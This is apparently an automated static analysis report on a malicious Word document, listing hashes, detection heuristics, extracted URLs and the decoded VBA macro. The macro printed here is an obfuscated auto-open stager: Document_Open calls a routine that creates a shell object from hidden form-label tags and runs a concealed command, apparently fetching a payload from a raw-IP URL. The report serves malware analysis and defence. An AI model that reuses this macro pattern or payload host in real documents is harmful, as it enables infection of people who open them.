Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04fa66526ce1c591…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 110.5 KB
Created: 2019-03-06 13:37:00
Authoring application: Microsoft Office Word
First seen: 2021-04-10
MD5: c9e3ee5db8f72aaf1c0be17f9eac06b1
SHA-1: 6e1557d8dd6d75c1190a25b62c87ae06f0eab0f8
SHA-256: 04fa66526ce1c591f380b768cd72eee63f032b372ccec4a23cd25bbb766fe756
Risk score: 170

Heuristics (6)

  • Malformed OLE auto-open stager with embedded ZIP payload [critical] OLE_RAW_MALFORMED_AUTOOPEN_STAGER
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
        Set JJJJKKKK3 = CreateObject("" + TadaSHC.Label2.Tag & "")
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Matched line in script:
        Sub Document_Open()
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OLE body). Of these, only http://167.179.86.255/rb1 is neither an XML namespace identifier nor a code-signing certificate URL; the trailing characters after several of the Comodo URLs (0C, 0, 0t, 0$, 0q) are adjacent bytes of the embedded certificate's DER encoding picked up by the string extractor, not part of the URL.
    • http://167.179.86.255/rb1
    • https://secure.comodo.net/CPS0C
    • http://ocsp.comodoca.com0
    • http://www.iec.ch
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://ns.adobe.com/photoshop/1.0/
    • http://schemas.openxmlformats.org/drawingml/2006/main
    • http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
    • http://crt.comodoca.com/COMODORSACodeSigningCA.crt0$
    • http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
    • http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 3001 bytes
    SHA-256: cbce5271087807d2123b2b1d77cc03e384c23a0256559f822b8a15d75e55c8db
    Signed: the VBA project carries a digital signature. The signature covers the VBA source only, not the compiled p-code, and a digital signature does not by itself mean the macro is safe.

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

    Public Function getQuestionId() As Integer
         getQues.tionValue "id"
    End Function
    Public Function getQuestionId2() As Integer
         getQuest.ionValue "id"
    End Function

Public Sub fill(dgv)
        Dim adapter
        Dim DataSet

            connection.Open
            adapter = SqlData.adapter(Command)
            DataSet = DataSet
            adapter.fill (DataSet)
            If DataSet.Tables.Count > 0 Then
                dgv.Refresh
                dgv.DataSource = DataSet.Tables(0)
            End If
            MsgBox (ex.Message)
            Thr.ow ex
            If connection.State = ConnectionState.Open Then
                connection.Close
            End If
End Sub

Sub LoadQuestions()
        db.fill (dgvQuestions)
    End Sub
     Sub LoadToolStripMenuItem_Click(sender, e)
     Hand.les LoadToolStripMenuItem.Click
        LoadQuestions
    End Sub

     Sub welcome_Load(sender, e)
     Hand.les MyBase.Load
        LoadQuestions
    End Sub
Sub Document_Open()

Dim htooBJ0 As Object
Dim htooBJ7 As Object
Dim htooBJ11 As Object
Dim htooBJ12 As Object
Dim c As New Class1
c.PowerOn

Dim htooBJ5 As Object
Dim htooBJ6 As Object
Dim htooBJ9 As Object


ActiveDocument.Close False
getQuestionId
Application.Quit False
End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub PowerOn()
Application.Run TadaSHC.Label3.Tag
End Sub

Attribute VB_Name = "Module1"

Public Sub GACK()
Dim PathTo1 As String
Dim JJJJKKKK3 As Object

Dim SevenR01 As Object

Dim SevenR03 As Object
Dim SevenR09 As Object
Dim SevenR0 As Object
Set JJJJKKKK3 = CreateObject("" + TadaSHC.Label2.Tag & "")
Dim SevenR05 As Object
Dim SevenR06 As Object

Dim SevenR00 As Object
Dim SevenR07 As Object
On Error Resume Next

Dim SevenR011 As Object
Dim SevenR012 As Object
Dim SevenR04 As Object

JJJJKKKK3.Run TadaSHC.Label1.Tag + " at=cqVIks1¶µ±! " & TadaSHC.Tag + " ", 0, False

Dim SevenR034 As Object
Dim SevenR08 As Object

End Sub

Attribute VB_Name = "TadaSHC"
Attribute VB_Base = "0{727D31C4-B964-4A71-9668-F9AF2C41A81D}{FA1BC165-0C60-4CBC-A717-D34D7CDDB29E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False